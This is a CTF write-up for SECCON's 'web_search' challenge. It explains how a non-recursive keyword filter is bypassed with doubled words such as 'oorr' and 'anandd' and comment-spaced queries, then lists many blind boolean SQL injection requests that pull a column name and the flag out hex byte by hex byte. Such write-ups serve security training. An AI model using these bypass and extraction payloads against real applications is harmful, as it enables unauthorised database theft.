Tags: web blind-sql-injection 

Rating: 0

# ▼▼▼web_search(Web:212、93/799=11.6%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

```
Get a hidden message! Let's find a hidden message using the search system on the site.

http://web-search.chal.seccon.jp/

```

---

# 【Information gathering】

`http://web-search.chal.seccon.jp/`

↓ Access URL

```

<html lang="en">
<head>
<meta charset="UTF-8">
<title>Articles</title>
</head>
<body>

<form action="./" method="get">
<input type="text" name="q" value=""><input type="submit" value="Search">
</form>
<dl><dt>RFC 748</dt><dd>TELNET RANDOMLY-LOSE Option</dd><dt>RFC 1097</dt><dd>TELNET SUBLIMINAL-MESSAGE option</dd><dt>RFC 1149</dt><dd>Standard for the transmission of IP datagrams on Avian Carriers</dd><dt>RFC 1216</dt><dd>Gigabit Network Economics and Paradigm Shifts</dd><dt>RFC 1217</dt><dd>Memo from the Consortium for Slow Commotion Research (CSCR)</dd><dt>RFC 1313</dt><dd>Today's Programming for KRFC AM 1313 Internet Talk Radio</dd><dt>RFC 1437</dt><dd>The Extension of MIME Content-Types to a New Medium</dd><dt>RFC 1438</dt><dd>Internet Engineering Task Force Statements Of Boredom (SOBs)</dd><dt>RFC 1605</dt><dd>SONET to Sonnet Translation</dd><dt>RFC 1606</dt><dd>A Historical Perspective On The Usage Of IP Version 9</dd><dt>RFC 1607</dt><dd>A view from the 21st Century</dd><dt>RFC 1776</dt><dd>The Address is the Message</dd><dt>RFC 1924</dt><dd>A Compact Representation of IPv6 Addresses</dd><dt>RFC 1925</dt><dd>The Twelve Networking Truths</dd><dt>RFC 1926</dt><dd>An Experimental Encapsulation of IP Datagrams on Top of ATM</dd><dt>RFC 1927</dt><dd>Suggested Additional MIME Types for Associating Documents</dd><dt>RFC 2100</dt><dd>The Naming of Hosts</dd><dt>RFC 2321</dt><dd>RITA -- The Reliable Internetwork Troubleshooting Agent</dd><dt>RFC 2322</dt><dd>Management of IP numbers by peg-dhcp</dd><dt>RFC 2323</dt><dd>IETF Identification and Security Guidelines</dd><dt>RFC 2324</dt><dd>Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)</dd><dt>RFC 2325</dt><dd>Definitions of Managed Objects for Drip-Type Heated Beverage Hardware Devices using SMIv2</dd><dt>RFC 2549</dt><dd>IP over Avian Carriers with Quality of Service</dd><dt>RFC 2550</dt><dd>Y10K and Beyond</dd><dt>RFC 2551</dt><dd>The Roman Standards Process -- Revision III</dd><dt>RFC 2795</dt><dd>The Infinite Monkey Protocol Suite (IMPS)</dd><dt>RFC 3091</dt><dd>Pi Digit Generation Protocol</dd><dt>RFC 3092</dt><dd>Etymology of "Foo"</dd><dt>RFC 3093</dt><dd>Firewall Enhancement Protocol (FEP)</dd><dt>RFC 3251</dt><dd>Electricity over IP</dd><dt>RFC 3252</dt><dd>Binary Lexical Octet Ad-hoc Transport</dd><dt>RFC 3514</dt><dd>The Security Flag in the IPv4 Header (Evil Bit)</dd><dt>RFC 3751</dt><dd>Omniscience Protocol Requirement</dd><dt>RFC 4041</dt><dd>Requirements for Morality Sections in Routing Area Drafts</dd><dt>RFC 4042</dt><dd>UTF-9 and UTF-18 Efficient Transformation Formats of Unicode</dd><dt>RFC 4824</dt><dd>The Transmission of IP Datagrams over the Semaphore Flag Signaling System (SFSS)</dd><dt>RFC 5241</dt><dd>Naming Rights in IETF Protocols</dd><dt>RFC 5242</dt><dd>A Generalized Unified Character Code: Western European and CJK Sections</dd><dt>RFC 5513</dt><dd>IANA Considerations for Three Letter Acronyms</dd><dt>RFC 5514</dt><dd>IPv6 over Social Networks</dd><dt>RFC 5841</dt><dd>TCP Option to Denote Packet Mood</dd><dt>RFC 5984</dt><dd>Increasing Throughput in IP Networks with ESP-Based Forwarding: ESPBasedForwarding</dd><dt>RFC 6214</dt><dd>Adaptation of RFC 1149 for IPv6</dd><dt>RFC 6217</dt><dd>Regional Broadcast Using an Atmospheric Link Layer</dd><dt>RFC 6592</dt><dd>The Null Packet</dd><dt>RFC 6593</dt><dd>Service Undiscovery Using Hide-and-Go-Seek for the Domain Pseudonym System (DPS)</dd><dt>RFC 6919</dt><dd>Further Key Words for Use in RFCs to Indicate Requirement Levels</dd><dt>RFC 6921</dt><dd>Design Considerations for Faster-Than-Light (FTL) Communication</dd><dt>RFC 7168</dt><dd>The Hyper Text Coffee Pot Control Protocol for Tea Efflux Appliances (HTCPCP-TEA)</dd><dt>RFC 7169</dt><dd>The NSA (No Secrecy Afforded) Certificate Extension</dd></dl>


Prev
/
Next

</body>
</html>
```

---

The input value is reflected, but you can see that it has been partially deleted

`GET /?q='or''='` ⇒ `<input type="text" name="q" value="'''='"><input type="submit" value="Search">`

`or` has been deleted!!

---

## 【1.Investigate what else has been removed】

`or`,`and`,Space,`!`,`%`,`|` Is deleted !!

Not recursively deleted.

For example, if I want to use `or`, I can bypass it with `oorr`

---

`GET /?q='oorr''=''%23`

```

<html lang="en">
<head>
<meta charset="UTF-8">
<title>Articles</title>
</head>
<body>

<form action="./" method="get">
<input type="text" name="q" value="'or''=''#"><input type="submit" value="Search">
</form>
<dl><dt>RFC 748</dt><dd>TELNET RANDOMLY-LOSE Option</dd><dt>RFC 1097</dt><dd>TELNET SUBLIMINAL-MESSAGE option</dd><dt>RFC 1149</dt><dd>Standard for the transmission of IP datagrams on Avian Carriers</dd><dt>RFC 1216</dt><dd>Gigabit Network Economics and Paradigm Shifts</dd><dt>RFC 1217</dt><dd>Memo from the Consortium for Slow Commotion Research (CSCR)</dd><dt>RFC 1313</dt><dd>Today's Programming for KRFC AM 1313 Internet Talk Radio</dd><dt>RFC 1437</dt><dd>The Extension of MIME Content-Types to a New Medium</dd><dt>RFC 1438</dt><dd>Internet Engineering Task Force Statements Of Boredom (SOBs)</dd><dt>RFC 1605</dt><dd>SONET to Sonnet Translation</dd><dt>RFC 1606</dt><dd>A Historical Perspective On The Usage Of IP Version 9</dd><dt>RFC 1607</dt><dd>A view from the 21st Century</dd><dt>RFC 1776</dt><dd>The Address is the Message</dd><dt>RFC 1924</dt><dd>A Compact Representation of IPv6 Addresses</dd><dt>RFC 1925</dt><dd>The Twelve Networking Truths</dd><dt>RFC 1926</dt><dd>An Experimental Encapsulation of IP Datagrams on Top of ATM</dd><dt>RFC 1927</dt><dd>Suggested Additional MIME Types for Associating Documents</dd><dt>RFC 2100</dt><dd>The Naming of Hosts</dd><dt>RFC 2321</dt><dd>RITA -- The Reliable Internetwork Troubleshooting Agent</dd><dt>RFC 2322</dt><dd>Management of IP numbers by peg-dhcp</dd><dt>RFC 2323</dt><dd>IETF Identification and Security Guidelines</dd><dt>RFC 2324</dt><dd>Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0)</dd><dt>RFC 2325</dt><dd>Definitions of Managed Objects for Drip-Type Heated Beverage Hardware Devices using SMIv2</dd><dt>RFC 2549</dt><dd>IP over Avian Carriers with Quality of Service</dd><dt>RFC 2550</dt><dd>Y10K and Beyond</dd><dt>RFC 2551</dt><dd>The Roman Standards Process -- Revision III</dd><dt>RFC 2795</dt><dd>The Infinite Monkey Protocol Suite (IMPS)</dd><dt>RFC 3091</dt><dd>Pi Digit Generation Protocol</dd><dt>RFC 3092</dt><dd>Etymology of "Foo"</dd><dt>RFC 3093</dt><dd>Firewall Enhancement Protocol (FEP)</dd><dt>RFC 3251</dt><dd>Electricity over IP</dd><dt>RFC 3252</dt><dd>Binary Lexical Octet Ad-hoc Transport</dd><dt>RFC 3514</dt><dd>The Security Flag in the IPv4 Header (Evil Bit)</dd><dt>RFC 3751</dt><dd>Omniscience Protocol Requirement</dd><dt>RFC 4041</dt><dd>Requirements for Morality Sections in Routing Area Drafts</dd><dt>RFC 4042</dt><dd>UTF-9 and UTF-18 Efficient Transformation Formats of Unicode</dd><dt>RFC 4824</dt><dd>The Transmission of IP Datagrams over the Semaphore Flag Signaling System (SFSS)</dd><dt>RFC 5241</dt><dd>Naming Rights in IETF Protocols</dd><dt>RFC 5242</dt><dd>A Generalized Unified Character Code: Western European and CJK Sections</dd><dt>RFC 5513</dt><dd>IANA Considerations for Three Letter Acronyms</dd><dt>RFC 5514</dt><dd>IPv6 over Social Networks</dd><dt>RFC 5841</dt><dd>TCP Option to Denote Packet Mood</dd><dt>RFC 5984</dt><dd>Increasing Throughput in IP Networks with ESP-Based Forwarding: ESPBasedForwarding</dd><dt>RFC 6214</dt><dd>Adaptation of RFC 1149 for IPv6</dd><dt>RFC 6217</dt><dd>Regional Broadcast Using an Atmospheric Link Layer</dd><dt>RFC 6592</dt><dd>The Null Packet</dd><dt>RFC 6593</dt><dd>Service Undiscovery Using Hide-and-Go-Seek for the Domain Pseudonym System (DPS)</dd><dt>RFC 6919</dt><dd>Further Key Words for Use in RFCs to Indicate Requirement Levels</dd><dt>RFC 6921</dt><dd>Design Considerations for Faster-Than-Light (FTL) Communication</dd><dt>RFC 7168</dt><dd>The Hyper Text Coffee Pot Control Protocol for Tea Efflux Appliances (HTCPCP-TEA)</dd><dt>RFC 7169</dt><dd>The NSA (No Secrecy Afforded) Certificate Extension</dd><dt>RFC 7511</dt><dd>Scenic Routing for IPv6</dd><dt>RFC 7514</dt><dd>Really Explicit Congestion Notification (RECN)</dd><dt>RFC 8135</dt><dd>Complex Addressing in IPv6</dd><dt>RFC 8136</dt><dd>Additional Transition Functionality for IPv6</dd><dt>RFC 8140</dt><dd>The Arte of ASCII: Or, An True and Accurate Representation of an Menagerie of Thynges Fabulous and Wonderful in Ye Forme of Character</dd><dt>RFC 8367</dt><dd>Wrongful Termination of Internet Protocol (IP) Packets</dd><dt>RFC 8369</dt><dd>Internationalizing IPv6 Using 128-Bit Unicode</dd><dt>RFC 8565</dt><dd>Hypertext Jeopardy Protocol (HTJP/1.0)</dd><dt>RFC 8567</dt><dd>Customer Management DNS Resource Records</dd><dt>FLAG</dt><dd>The flag is "SECCON{Yeah_Sqli_Success_" ... well, the rest of flag is in "flag" table. Try more!</dd></dl>


Prev
/
Next

</body>
</html>
```

`<dd>The flag is "SECCON{Yeah_Sqli_Success_" ... well, the rest of flag is in "flag" table. Try more!</dd>`

Also, it was found that there was a `SQL injection` vulnerability

---

## 【2.Get number of columns in flag table】

```
"information_schema.columns" is "infoorrmation_schema.columns" because "or" is deleted
"and" is "anandd" because "and" is deleted
```

`GET /?q='/**/anandd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/anandd/**/table_name='flag')=1/**/%23`

`Content-Length: 4746`

There is one column.

---
## 【3.Get column name of flag table】

```
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='70')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='7069')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='706965')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='70696563')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()/**/aornd/**/table_name='flag'/**/aornd/**/hex(column_name)>='7069656365')=1/**/%23
```

`7069656365`

column_name is `piece`

---

## 【4.Get "piece" column of flag table】

```
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='59')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f75')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f5769')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f59')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f5965')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f596561')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f59656168')=1/**/%23
GET /?q='/**/aornd/**/(select/**/count(piece)/**/from/**/flag/**/where/**/hex(piece)>='596f755f57696e5f596561687d')=1/**/%23
```

`596f755f57696e5f596561687d`

`You_Win_Yeah}`

`SECCON{Yeah_Sqli_Success_You_Win_Yeah}`